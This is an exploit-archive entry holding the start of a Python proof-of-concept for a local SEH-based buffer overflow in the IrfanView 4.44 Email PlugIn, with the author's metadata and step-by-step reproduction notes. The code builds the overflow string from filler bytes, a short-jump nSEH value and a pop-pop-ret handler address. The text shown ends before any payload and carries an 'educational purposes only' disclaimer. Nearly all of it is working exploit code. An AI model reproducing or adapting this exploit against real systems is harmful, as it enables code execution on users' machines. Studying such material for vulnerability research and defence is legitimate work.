Exploits / Vulnerability Discovered: 2018-03-02
Type: local
Platform: windows
This exploit / vulnerability, IrfanView 4.44 Email PlugIn buffer overflow (SEH), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#
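filename = "irfan.txt"
# filler that precedes the overwritten SEH record
junk = "\x41"*1236
# nSEH field: short jump forward 6 bytes (eb 06), padded with two NOPs
nseh = "\xeb\x06\x90\x90"
# SEH handler field, little-endian address of:
# 0x10021420 : pop ebp # pop ebx # ret
seh = "\x20\x14\x02\x10"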